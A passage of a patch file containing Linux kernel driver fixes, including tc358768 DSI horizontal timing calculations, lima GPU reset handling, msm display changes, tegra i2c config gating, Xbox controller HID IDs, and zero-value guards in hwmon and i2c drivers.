++		dsi_hsw = tc358768_dpi_to_dsi_bytes(priv, vm.hsync_len);
++		dsi_hbp = tc358768_dpi_to_dsi_bytes(priv, vm.hback_porch);
++	} else {
++		/* HBP is included in HSW in event mode */
++		dsi_hbp = 0;
++		dsi_hsw = tc358768_dpi_to_dsi_bytes(priv,
++						    vm.hsync_len +
++						    vm.hback_porch);
++
++		/*
++		 * The pixel packet includes the actual pixel data, and:
++		 * DSI packet header = 4 bytes
++		 * DCS code = 1 byte
++		 * DSI packet footer = 2 bytes
++		 */
++		dsi_hact = hact + 4 + 1 + 2;
++
++		dsi_hfp = dsi_dpi_htot - dsi_hact - dsi_hsw - dsi_hss;
++
++		/*
++		 * Here we should check if HFP is long enough for entering LP
++		 * and exiting LP, but it's not clear how to calculate that.
++		 * Instead, this is a naive algorithm that just adjusts the HFP
++		 * and HSW so that HFP is (at least) roughly 2/3 of the total
++		 * blanking time.
++		 */
++		if (dsi_hfp < (dsi_hfp + dsi_hsw + dsi_hss) * 2 / 3) {
++			u32 old_hfp = dsi_hfp;
++			u32 old_hsw = dsi_hsw;
++			u32 tot = dsi_hfp + dsi_hsw + dsi_hss;
++
++			dsi_hsw = tot / 3;
++
++			/*
++			 * Seems like sometimes HSW has to be divisible by num-lanes, but
++			 * not always...
++			 */
++			dsi_hsw = roundup(dsi_hsw, priv->dsi_lanes);
++
++			dsi_hfp = dsi_dpi_htot - dsi_hact - dsi_hsw - dsi_hss;
++
++			dev_dbg(dev,
++				"hfp too short, adjusting dsi hfp and dsi hsw from %u, %u to %u, %u\n",
++				old_hfp, old_hsw, dsi_hfp, dsi_hsw);
++		}
++
++		dev_dbg(dev,
++			"dsi horiz timing (bytes): %u, %u + %u + %u + %u = %u\n",
++			dsi_hss, dsi_hsw, dsi_hbp, dsi_hact, dsi_hfp,
++			dsi_hss + dsi_hsw + dsi_hbp + dsi_hact + dsi_hfp);
++
++		dev_dbg(dev, "dsi horiz timing (ns): %u + %u + %u + %u + %u = %u\n",
++			tc358768_dsi_bytes_to_ns(priv, dsi_hss),
++			tc358768_dsi_bytes_to_ns(priv, dsi_hsw),
++			tc358768_dsi_bytes_to_ns(priv, dsi_hbp),
++			tc358768_dsi_bytes_to_ns(priv, dsi_hact),
++			tc358768_dsi_bytes_to_ns(priv, dsi_hfp),
++			tc358768_dsi_bytes_to_ns(priv, dsi_hss + dsi_hsw +
++						 dsi_hbp + dsi_hact + dsi_hfp));
++	}
++
++	/* VSDly calculation */
++
++	/* Start with the HW internal delay */
++	dsi_vsdly = internal_dly;
++
++	/* Convert to byte units as the other variables are in byte units */
++	dsi_vsdly *= priv->dsi_lanes;
++
++	/* Do we need more delay, in addition to the internal? */
++	if (dsi_dpi_data_start > dsi_vsdly + dsi_hss + dsi_hsw + dsi_hbp) {
++		dsi_vsdly = dsi_dpi_data_start - dsi_hss - dsi_hsw - dsi_hbp;
++		dsi_vsdly = roundup(dsi_vsdly, priv->dsi_lanes);
++	}
++
++	dev_dbg(dev, "dsi data start (bytes) %u + %u + %u + %u = %u\n",
++		dsi_vsdly, dsi_hss, dsi_hsw, dsi_hbp,
++		dsi_vsdly + dsi_hss + dsi_hsw + dsi_hbp);
++
++	dev_dbg(dev, "dsi data start (ns) %u + %u + %u + %u = %u\n",
++		tc358768_dsi_bytes_to_ns(priv, dsi_vsdly),
++		tc358768_dsi_bytes_to_ns(priv, dsi_hss),
++		tc358768_dsi_bytes_to_ns(priv, dsi_hsw),
++		tc358768_dsi_bytes_to_ns(priv, dsi_hbp),
++		tc358768_dsi_bytes_to_ns(priv, dsi_vsdly + dsi_hss + dsi_hsw + dsi_hbp));
++
++	/* Convert back to hsbyteclk */
++	dsi_vsdly /= priv->dsi_lanes;
++
++	/*
++	 * The docs say that there is an internal delay of 40 cycles.
++	 * However, we get underflows if we follow that rule. If we
++	 * instead ignore the internal delay, things work. So either
++	 * the docs are wrong or the calculations are wrong.
++	 *
++	 * As a temporary fix, add the internal delay here, to counter
++	 * the subtraction when writing the register.
++	 */
++	dsi_vsdly += internal_dly;
++
++	/* Clamp to the register max */
++	if (dsi_vsdly - internal_dly > 0x3ff) {
++		dev_warn(dev, "VSDly too high, underflows likely\n");
++		dsi_vsdly = 0x3ff + internal_dly;
++	}
++
+ 	/* VSDly[9:0] */
+-	video_start = max(video_start, internal_delay + 1) - internal_delay;
+-	tc358768_write(priv, TC358768_VSDLY, video_start);
++	tc358768_write(priv, TC358768_VSDLY, dsi_vsdly - internal_dly);
+ 
+ 	tc358768_write(priv, TC358768_DATAFMT, val);
+ 	tc358768_write(priv, TC358768_DSITX_DT, data_type);
+@@ -827,18 +999,6 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 		/* vbp */
+ 		tc358768_write(priv, TC358768_DSI_VBPR, vm.vback_porch);
+-
+-		/* hsw * byteclk * ndl / pclk */
+-		val = (u32)div_u64(vm.hsync_len *
+-				   (u64)hsbyteclk * priv->dsi_lanes,
+-				   vm.pixelclock);
+-		tc358768_write(priv, TC358768_DSI_HSW, val);
+-
+-		/* hbp * byteclk * ndl / pclk */
+-		val = (u32)div_u64(vm.hback_porch *
+-				   (u64)hsbyteclk * priv->dsi_lanes,
+-				   vm.pixelclock);
+-		tc358768_write(priv, TC358768_DSI_HBPR, val);
+ 	} else {
+ 		/* Set event mode */
+ 		tc358768_write(priv, TC358768_DSI_EVENT, 1);
+@@ -852,16 +1012,13 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 		/* vbp (not used in event mode) */
+ 		tc358768_write(priv, TC358768_DSI_VBPR, 0);
++	}
+ 
+-		/* (hsw + hbp) * byteclk * ndl / pclk */
+-		val = (u32)div_u64((vm.hsync_len + vm.hback_porch) *
+-				   (u64)hsbyteclk * priv->dsi_lanes,
+-				   vm.pixelclock);
+-		tc358768_write(priv, TC358768_DSI_HSW, val);
++	/* hsw (bytes) */
++	tc358768_write(priv, TC358768_DSI_HSW, dsi_hsw);
+ 
+-		/* hbp (not used in event mode) */
+-		tc358768_write(priv, TC358768_DSI_HBPR, 0);
+-	}
++	/* hbp (bytes) */
++	tc358768_write(priv, TC358768_DSI_HBPR, dsi_hbp);
+ 
+ 	/* hact (bytes) */
+ 	tc358768_write(priv, TC358768_DSI_HACT, hact);
+diff --git a/drivers/gpu/drm/lima/lima_gp.c b/drivers/gpu/drm/lima/lima_gp.c
+index ca3842f719842..82071835ec9ed 100644
+--- a/drivers/gpu/drm/lima/lima_gp.c
++++ b/drivers/gpu/drm/lima/lima_gp.c
+@@ -166,6 +166,11 @@ static void lima_gp_task_run(struct lima_sched_pipe *pipe,
+ 	gp_write(LIMA_GP_CMD, cmd);
+ }
+ 
++static int lima_gp_bus_stop_poll(struct lima_ip *ip)
++{
++	return !!(gp_read(LIMA_GP_STATUS) & LIMA_GP_STATUS_BUS_STOPPED);
++}
++
+ static int lima_gp_hard_reset_poll(struct lima_ip *ip)
+ {
+ 	gp_write(LIMA_GP_PERF_CNT_0_LIMIT, 0xC01A0000);
+@@ -179,6 +184,13 @@ static int lima_gp_hard_reset(struct lima_ip *ip)
+ 
+ 	gp_write(LIMA_GP_PERF_CNT_0_LIMIT, 0xC0FFE000);
+ 	gp_write(LIMA_GP_INT_MASK, 0);
++
++	gp_write(LIMA_GP_CMD, LIMA_GP_CMD_STOP_BUS);
++	ret = lima_poll_timeout(ip, lima_gp_bus_stop_poll, 10, 100);
++	if (ret) {
++		dev_err(dev->dev, "%s bus stop timeout\n", lima_ip_name(ip));
++		return ret;
++	}
+ 	gp_write(LIMA_GP_CMD, LIMA_GP_CMD_RESET);
+ 	ret = lima_poll_timeout(ip, lima_gp_hard_reset_poll, 10, 100);
+ 	if (ret) {
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
+index bb35aa5f5709f..41e44a77c2beb 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
+@@ -31,24 +31,14 @@
+  * @fmt: Pointer to format string
+  */
+ #define DPU_DEBUG(fmt, ...)                                                \
+-	do {                                                               \
+-		if (drm_debug_enabled(DRM_UT_KMS))                         \
+-			DRM_DEBUG(fmt, ##__VA_ARGS__); \
+-		else                                                       \
+-			pr_debug(fmt, ##__VA_ARGS__);                      \
+-	} while (0)
++	DRM_DEBUG_DRIVER(fmt, ##__VA_ARGS__)
+ 
+ /**
+  * DPU_DEBUG_DRIVER - macro for hardware driver logging
+  * @fmt: Pointer to format string
+  */
+ #define DPU_DEBUG_DRIVER(fmt, ...)                                         \
+-	do {                                                               \
+-		if (drm_debug_enabled(DRM_UT_DRIVER))                      \
+-			DRM_ERROR(fmt, ##__VA_ARGS__); \
+-		else                                                       \
+-			pr_debug(fmt, ##__VA_ARGS__);                      \
+-	} while (0)
++	DRM_DEBUG_DRIVER(fmt, ##__VA_ARGS__)
+ 
+ #define DPU_ERROR(fmt, ...) pr_err("[dpu error]" fmt, ##__VA_ARGS__)
+ #define DPU_ERROR_RATELIMITED(fmt, ...) pr_err_ratelimited("[dpu error]" fmt, ##__VA_ARGS__)
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+index 62d48c0f905e4..61c456c5015a5 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+@@ -889,6 +889,9 @@ static int dpu_plane_prepare_fb(struct drm_plane *plane,
+ 			new_state->fb, &layout);
+ 	if (ret) {
+ 		DPU_ERROR_PLANE(pdpu, "failed to get format layout, %d\n", ret);
++		if (pstate->aspace)
++			msm_framebuffer_cleanup(new_state->fb, pstate->aspace,
++						pstate->needs_dirtyfb);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/dp/dp_ctrl.c b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+index bd1343602f553..3c001b792423b 100644
+--- a/drivers/gpu/drm/msm/dp/dp_ctrl.c
++++ b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+@@ -1248,6 +1248,8 @@ static int dp_ctrl_link_train(struct dp_ctrl_private *ctrl,
+ 	link_info.rate = ctrl->link->link_params.rate;
+ 	link_info.capabilities = DP_LINK_CAP_ENHANCED_FRAMING;
+ 
++	dp_link_reset_phy_params_vx_px(ctrl->link);
++
+ 	dp_aux_link_configure(ctrl->aux, &link_info);
+ 
+ 	if (drm_dp_max_downspread(dpcd))
+diff --git a/drivers/gpu/drm/msm/dp/dp_panel.c b/drivers/gpu/drm/msm/dp/dp_panel.c
+index d38086650fcf7..f2cc0cc0b66b7 100644
+--- a/drivers/gpu/drm/msm/dp/dp_panel.c
++++ b/drivers/gpu/drm/msm/dp/dp_panel.c
+@@ -113,22 +113,22 @@ static int dp_panel_read_dpcd(struct dp_panel *dp_panel)
+ static u32 dp_panel_get_supported_bpp(struct dp_panel *dp_panel,
+ 		u32 mode_edid_bpp, u32 mode_pclk_khz)
+ {
+-	struct dp_link_info *link_info;
++	const struct dp_link_info *link_info;
+ 	const u32 max_supported_bpp = 30, min_supported_bpp = 18;
+-	u32 bpp = 0, data_rate_khz = 0;
++	u32 bpp, data_rate_khz;
+ 
+-	bpp = min_t(u32, mode_edid_bpp, max_supported_bpp);
++	bpp = min(mode_edid_bpp, max_supported_bpp);
+ 
+ 	link_info = &dp_panel->link_info;
+ 	data_rate_khz = link_info->num_lanes * link_info->rate * 8;
+ 
+-	while (bpp > min_supported_bpp) {
++	do {
+ 		if (mode_pclk_khz * bpp <= data_rate_khz)
+-			break;
++			return bpp;
+ 		bpp -= 6;
+-	}
++	} while (bpp > min_supported_bpp);
+ 
+-	return bpp;
++	return min_supported_bpp;
+ }
+ 
+ static int dp_panel_update_modes(struct drm_connector *connector,
+@@ -421,8 +421,9 @@ int dp_panel_init_panel_info(struct dp_panel *dp_panel)
+ 				drm_mode->clock);
+ 	drm_dbg_dp(panel->drm_dev, "bpp = %d\n", dp_panel->dp_mode.bpp);
+ 
+-	dp_panel->dp_mode.bpp = max_t(u32, 18,
+-				min_t(u32, dp_panel->dp_mode.bpp, 30));
++	dp_panel->dp_mode.bpp = dp_panel_get_mode_bpp(dp_panel, dp_panel->dp_mode.bpp,
++						      dp_panel->dp_mode.drm_mode.clock);
++
+ 	drm_dbg_dp(panel->drm_dev, "updated bpp = %d\n",
+ 				dp_panel->dp_mode.bpp);
+ 
+diff --git a/drivers/gpu/drm/msm/msm_gem_shrinker.c b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+index 31f054c903a43..a35c98306f1e5 100644
+--- a/drivers/gpu/drm/msm/msm_gem_shrinker.c
++++ b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+@@ -76,7 +76,7 @@ static bool
+ wait_for_idle(struct drm_gem_object *obj)
+ {
+ 	enum dma_resv_usage usage = dma_resv_usage_rw(true);
+-	return dma_resv_wait_timeout(obj->resv, usage, false, 1000) > 0;
++	return dma_resv_wait_timeout(obj->resv, usage, false, 10) > 0;
+ }
+ 
+ static bool
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index 80b8c83342840..a6071464a543f 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -1258,6 +1258,11 @@ static void vop2_plane_atomic_update(struct drm_plane *plane,
+ 		vop2_win_write(win, VOP2_WIN_AFBC_ROTATE_270, rotate_270);
+ 		vop2_win_write(win, VOP2_WIN_AFBC_ROTATE_90, rotate_90);
+ 	} else {
++		if (vop2_cluster_window(win)) {
++			vop2_win_write(win, VOP2_WIN_AFBC_ENABLE, 0);
++			vop2_win_write(win, VOP2_WIN_AFBC_TRANSFORM_OFFSET, 0);
++		}
++
+ 		vop2_win_write(win, VOP2_WIN_YRGB_VIR, DIV_ROUND_UP(fb->pitches[0], 4));
+ 	}
+ 
+diff --git a/drivers/gpu/drm/tegra/gem.c b/drivers/gpu/drm/tegra/gem.c
+index 81991090adcc9..cd06f25499549 100644
+--- a/drivers/gpu/drm/tegra/gem.c
++++ b/drivers/gpu/drm/tegra/gem.c
+@@ -175,7 +175,7 @@ static void tegra_bo_unpin(struct host1x_bo_mapping *map)
+ static void *tegra_bo_mmap(struct host1x_bo *bo)
+ {
+ 	struct tegra_bo *obj = host1x_to_tegra_bo(bo);
+-	struct iosys_map map;
++	struct iosys_map map = { 0 };
+ 	int ret;
+ 
+ 	if (obj->vaddr) {
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 0e5b2b3dea4d0..1395270a30cb0 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -924,7 +924,15 @@
+ #define USB_DEVICE_ID_MS_TYPE_COVER_2    0x07a9
+ #define USB_DEVICE_ID_MS_POWER_COVER     0x07da
+ #define USB_DEVICE_ID_MS_SURFACE3_COVER		0x07de
+-#define USB_DEVICE_ID_MS_XBOX_ONE_S_CONTROLLER	0x02fd
++/*
++ * For a description of the Xbox controller models, refer to:
++ * https://en.wikipedia.org/wiki/Xbox_Wireless_Controller#Summary
++ */
++#define USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1708	0x02fd
++#define USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1708_BLE	0x0b20
++#define USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1914	0x0b13
++#define USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1797	0x0b05
++#define USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1797_BLE	0x0b22
+ #define USB_DEVICE_ID_MS_PIXART_MOUSE    0x00cb
+ #define USB_DEVICE_ID_8BITDO_SN30_PRO_PLUS      0x02e0
+ #define USB_DEVICE_ID_MS_MOUSE_0783      0x0783
+diff --git a/drivers/hid/hid-microsoft.c b/drivers/hid/hid-microsoft.c
+index 071fd093a5f4e..9345e2bfd56ed 100644
+--- a/drivers/hid/hid-microsoft.c
++++ b/drivers/hid/hid-microsoft.c
+@@ -446,7 +446,16 @@ static const struct hid_device_id ms_devices[] = {
+ 		.driver_data = MS_PRESENTER },
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, 0x091B),
+ 		.driver_data = MS_SURFACE_DIAL },
+-	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_ONE_S_CONTROLLER),
++
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1708),
++		.driver_data = MS_QUIRK_FF },
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1708_BLE),
++		.driver_data = MS_QUIRK_FF },
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1914),
++		.driver_data = MS_QUIRK_FF },
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1797),
++		.driver_data = MS_QUIRK_FF },
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1797_BLE),
+ 		.driver_data = MS_QUIRK_FF },
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_8BITDO_SN30_PRO_PLUS),
+ 		.driver_data = MS_QUIRK_FF },
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 05e40880e7d46..82f171f6d0c53 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1921,12 +1921,14 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ 	int fmax = field->logical_maximum;
+ 	unsigned int equivalent_usage = wacom_equivalent_usage(usage->hid);
+ 	int resolution_code = code;
+-	int resolution = hidinput_calc_abs_res(field, resolution_code);
++	int resolution;
+ 
+ 	if (equivalent_usage == HID_DG_TWIST) {
+ 		resolution_code = ABS_RZ;
+ 	}
+ 
++	resolution = hidinput_calc_abs_res(field, resolution_code);
++
+ 	if (equivalent_usage == HID_GD_X) {
+ 		fmin += features->offset_left;
+ 		fmax -= features->offset_right;
+diff --git a/drivers/hwmon/ltc2992.c b/drivers/hwmon/ltc2992.c
+index d88e883c7492c..b5dc0b7d25ae7 100644
+--- a/drivers/hwmon/ltc2992.c
++++ b/drivers/hwmon/ltc2992.c
+@@ -875,8 +875,14 @@ static int ltc2992_parse_dt(struct ltc2992_state *st)
+ 		}
+ 
+ 		ret = fwnode_property_read_u32(child, "shunt-resistor-micro-ohms", &val);
+-		if (!ret)
++		if (!ret) {
++			if (!val) {
++				fwnode_handle_put(child);
++				return dev_err_probe(&st->client->dev, -EINVAL,
++						     "shunt resistor value cannot be zero\n");
++			}
+ 			st->r_sense_uohm[addr] = val;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/hwmon/pc87360.c b/drivers/hwmon/pc87360.c
+index a4adc8bd531ff..534a6072036c9 100644
+--- a/drivers/hwmon/pc87360.c
++++ b/drivers/hwmon/pc87360.c
+@@ -323,7 +323,11 @@ static struct pc87360_data *pc87360_update_device(struct device *dev)
+ 		}
+ 
+ 		/* Voltages */
+-		for (i = 0; i < data->innr; i++) {
++		/*
++		 * The min() below does not have any practical meaning and is
++		 * only needed to silence a warning observed with gcc 12+.
++		 */
++		for (i = 0; i < min(data->innr, ARRAY_SIZE(data->in)); i++) {
+ 			data->in_status[i] = pc87360_read_value(data, LD_IN, i,
+ 					     PC87365_REG_IN_STATUS);
+ 			/* Clear bits */
+diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
+index cc957655cec24..471279bd70061 100644
+--- a/drivers/i2c/busses/i2c-qcom-geni.c
++++ b/drivers/i2c/busses/i2c-qcom-geni.c
+@@ -990,8 +990,10 @@ static int __maybe_unused geni_i2c_runtime_resume(struct device *dev)
+ 		return ret;
+ 
+ 	ret = clk_prepare_enable(gi2c->core_clk);
+-	if (ret)
++	if (ret) {
++		geni_icc_disable(&gi2c->se);
+ 		return ret;
++	}
+ 
+ 	ret = geni_se_resources_on(&gi2c->se);
+ 	if (ret) {
+diff --git a/drivers/i2c/busses/i2c-riic.c b/drivers/i2c/busses/i2c-riic.c
+index 849848ccb0802..b9959621cc5d7 100644
+--- a/drivers/i2c/busses/i2c-riic.c
++++ b/drivers/i2c/busses/i2c-riic.c
+@@ -314,7 +314,7 @@ static int riic_init_hw(struct riic_dev *riic, struct i2c_timings *t)
+ 	 * frequency with only 62 clock ticks max (31 high, 31 low).
+ 	 * Aim for a duty of 60% LOW, 40% HIGH.
+ 	 */
+-	total_ticks = DIV_ROUND_UP(rate, t->bus_freq_hz);
++	total_ticks = DIV_ROUND_UP(rate, t->bus_freq_hz ?: 1);
+ 
+ 	for (cks = 0; cks < 7; cks++) {
+ 		/*
+diff --git a/drivers/i2c/busses/i2c-tegra.c b/drivers/i2c/busses/i2c-tegra.c
+index aa469b33ee2ee..f7b4977d66496 100644
+--- a/drivers/i2c/busses/i2c-tegra.c
++++ b/drivers/i2c/busses/i2c-tegra.c
+@@ -298,6 +298,9 @@ struct tegra_i2c_dev {
+ 	bool is_vi;
+ };
+ 
++#define IS_DVC(dev) (IS_ENABLED(CONFIG_ARCH_TEGRA_2x_SOC) && (dev)->is_dvc)
++#define IS_VI(dev)  (IS_ENABLED(CONFIG_ARCH_TEGRA_210_SOC) && (dev)->is_vi)
++
+ static void dvc_writel(struct tegra_i2c_dev *i2c_dev, u32 val,
+ 		       unsigned int reg)
+ {
+@@ -315,9 +318,9 @@ static u32 dvc_readl(struct tegra_i2c_dev *i2c_dev, unsigned int reg)
+  */
+ static u32 tegra_i2c_reg_addr(struct tegra_i2c_dev *i2c_dev, unsigned int reg)
+ {
+-	if (i2c_dev->is_dvc)
++	if (IS_DVC(i2c_dev))
+ 		reg += (reg >= I2C_TX_FIFO) ? 0x10 : 0x40;
+-	else if (i2c_dev->is_vi)
++	else if (IS_VI(i2c_dev))
+ 		reg = 0xc00 + (reg << 2);
+ 
+ 	return reg;
+@@ -330,7 +333,7 @@ static void i2c_writel(struct tegra_i2c_dev *i2c_dev, u32 val, unsigned int reg)
+ 	/* read back register to make sure that register writes completed */
+ 	if (reg != I2C_TX_FIFO)
+ 		readl_relaxed(i2c_dev->base + tegra_i2c_reg_addr(i2c_dev, reg));
+-	else if (i2c_dev->is_vi)
++	else if (IS_VI(i2c_dev))
+ 		readl_relaxed(i2c_dev->base + tegra_i2c_reg_addr(i2c_dev, I2C_INT_STATUS));
+ }
+ 
+@@ -446,7 +449,7 @@ static int tegra_i2c_init_dma(struct tegra_i2c_dev *i2c_dev)
+ 	u32 *dma_buf;
+ 	int err;
+ 
+-	if (i2c_dev->is_vi)
++	if (IS_VI(i2c_dev))
+ 		return 0;
+ 
+ 	if (i2c_dev->hw->has_apb_dma) {
+@@ -639,7 +642,7 @@ static int tegra_i2c_init(struct tegra_i2c_dev *i2c_dev)
+ 
+ 	WARN_ON_ONCE(err);
+ 
+-	if (i2c_dev->is_dvc)
++	if (IS_DVC(i2c_dev))
+ 		tegra_dvc_init(i2c_dev);
+ 
+ 	val = I2C_CNFG_NEW_MASTER_FSM | I2C_CNFG_PACKET_MODE_EN |
+@@ -651,7 +654,7 @@ static int tegra_i2c_init(struct tegra_i2c_dev *i2c_dev)
+ 	i2c_writel(i2c_dev, val, I2C_CNFG);
+ 	i2c_writel(i2c_dev, 0, I2C_INT_MASK);
+ 
+-	if (i2c_dev->is_vi)
++	if (IS_VI(i2c_dev))
+ 		tegra_i2c_vi_init(i2c_dev);
+ 
+ 	switch (t->bus_freq_hz) {
+@@ -703,7 +706,7 @@ static int tegra_i2c_init(struct tegra_i2c_dev *i2c_dev)
+ 		return err;
+ 	}
+ 
+-	if (!i2c_dev->is_dvc && !i2c_dev->is_vi) {
++	if (!IS_DVC(i2c_dev) && !IS_VI(i2c_dev)) {
+ 		u32 sl_cfg = i2c_readl(i2c_dev, I2C_SL_CNFG);
+ 
+ 		sl_cfg |= I2C_SL_CNFG_NACK | I2C_SL_CNFG_NEWSL;
+@@ -846,7 +849,7 @@ static int tegra_i2c_fill_tx_fifo(struct tegra_i2c_dev *i2c_dev)
+ 		i2c_dev->msg_buf_remaining = buf_remaining;
+ 		i2c_dev->msg_buf = buf + words_to_transfer * BYTES_PER_FIFO_WORD;
+ 
+-		if (i2c_dev->is_vi)
++		if (IS_VI(i2c_dev))
+ 			i2c_writesl_vi(i2c_dev, buf, I2C_TX_FIFO, words_to_transfer);
+ 		else
+ 			i2c_writesl(i2c_dev, buf, I2C_TX_FIFO, words_to_transfer);
+@@ -933,7 +936,7 @@ static irqreturn_t tegra_i2c_isr(int irq, void *dev_id)
+ 	}
+ 
+ 	i2c_writel(i2c_dev, status, I2C_INT_STATUS);
+-	if (i2c_dev->is_dvc)
++	if (IS_DVC(i2c_dev))
+ 		dvc_writel(i2c_dev, DVC_STATUS_I2C_DONE_INTR, DVC_STATUS);
+ 
+ 	/*
+@@ -972,7 +975,7 @@ static irqreturn_t tegra_i2c_isr(int irq, void *dev_id)
+ 
+ 	i2c_writel(i2c_dev, status, I2C_INT_STATUS);
+ 
+-	if (i2c_dev->is_dvc)
++	if (IS_DVC(i2c_dev))
+ 		dvc_writel(i2c_dev, DVC_STATUS_I2C_DONE_INTR, DVC_STATUS);
+ 
+ 	if (i2c_dev->dma_mode) {
+@@ -1654,13 +1657,17 @@ static const struct tegra_i2c_hw_feature tegra194_i2c_hw = {
+ static const struct of_device_id tegra_i2c_of_match[] = {
+ 	{ .compatible = "nvidia,tegra194-i2c", .data = &tegra194_i2c_hw, },
+ 	{ .compatible = "nvidia,tegra186-i2c", .data = &tegra186_i2c_hw, },
++#if IS_ENABLED(CONFIG_ARCH_TEGRA_210_SOC)
+ 	{ .compatible = "nvidia,tegra210-i2c-vi", .data = &tegra210_i2c_hw, },
++#endif
+ 	{ .compatible = "nvidia,tegra210-i2c", .data = &tegra210_i2c_hw, },
+ 	{ .compatible = "nvidia,tegra124-i2c", .data = &tegra124_i2c_hw, },
+ 	{ .compatible = "nvidia,tegra114-i2c", .data = &tegra114_i2c_hw, },
+ 	{ .compatible = "nvidia,tegra30-i2c", .data = &tegra30_i2c_hw, },
+ 	{ .compatible = "nvidia,tegra20-i2c", .data = &tegra20_i2c_hw, },
++#if IS_ENABLED(CONFIG_ARCH_TEGRA_2x_SOC)
+ 	{ .compatible = "nvidia,tegra20-i2c-dvc", .data = &tegra20_i2c_hw, },
++#endif
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(of, tegra_i2c_of_match);
+@@ -1675,10 +1682,12 @@ static void tegra_i2c_parse_dt(struct tegra_i2c_dev *i2c_dev)
+ 	multi_mode = device_property_read_bool(i2c_dev->dev, "multi-master");
+ 	i2c_dev->multimaster_mode = multi_mode;
+ 
+-	if (of_device_is_compatible(np, "nvidia,tegra20-i2c-dvc"))
++	if (IS_ENABLED(CONFIG_ARCH_TEGRA_2x_SOC) &&
++	    of_device_is_compatible(np, "nvidia,tegra20-i2c-dvc"))
+ 		i2c_dev->is_dvc = true;
+ 
+-	if (of_device_is_compatible(np, "nvidia,tegra210-i2c-vi"))
++	if (IS_ENABLED(CONFIG_ARCH_TEGRA_210_SOC) &&
++	    of_device_is_compatible(np, "nvidia,tegra210-i2c-vi"))
+ 		i2c_dev->is_vi = true;
+ }
+ 
+@@ -1707,7 +1716,7 @@ static int tegra_i2c_init_clocks(struct tegra_i2c_dev *i2c_dev)
+ 	if (i2c_dev->hw == &tegra20_i2c_hw || i2c_dev->hw == &tegra30_i2c_hw)
+ 		i2c_dev->clocks[i2c_dev->nclocks++].id = "fast-clk";
+ 
+-	if (i2c_dev->is_vi)
++	if (IS_VI(i2c_dev))
+ 		i2c_dev->clocks[i2c_dev->nclocks++].id = "slow";
+ 
+ 	err = devm_clk_bulk_get(i2c_dev->dev, i2c_dev->nclocks,
+@@ -1823,9 +1832,9 @@ static int tegra_i2c_probe(struct platform_device *pdev)
+ 	 * domain.
+ 	 *
+ 	 * VI I2C device shouldn't be marked as IRQ-safe because VI I2C won't
+-	 * be used for atomic transfers.
++	 * be used for atomic transfers. ACPI device is not IRQ safe also.
+ 	 */
+-	if (!i2c_dev->is_vi)
++	if (!IS_VI(i2c_dev) && !has_acpi_companion(i2c_dev->dev))
+ 		pm_runtime_irq_safe(i2c_dev->dev);
+ 
+ 	pm_runtime_enable(i2c_dev->dev);
+@@ -1898,7 +1907,7 @@ static int __maybe_unused tegra_i2c_runtime_resume(struct device *dev)
+ 	 * power ON/OFF during runtime PM resume/suspend, meaning that
+ 	 * controller needs to be re-initialized after power ON.
+ 	 */
+-	if (i2c_dev->is_vi) {
++	if (IS_VI(i2c_dev)) {
+ 		err = tegra_i2c_init(i2c_dev);
+ 		if (err)
+ 			goto disable_clocks;
+diff --git a/drivers/i3c/master/mipi-i3c-hci/dma.c b/drivers/i3c/master/mipi-i3c-hci/dma.c
+index 71b5dbe45c45c..337c95d43f3f6 100644
+--- a/drivers/i3c/master/mipi-i3c-hci/dma.c
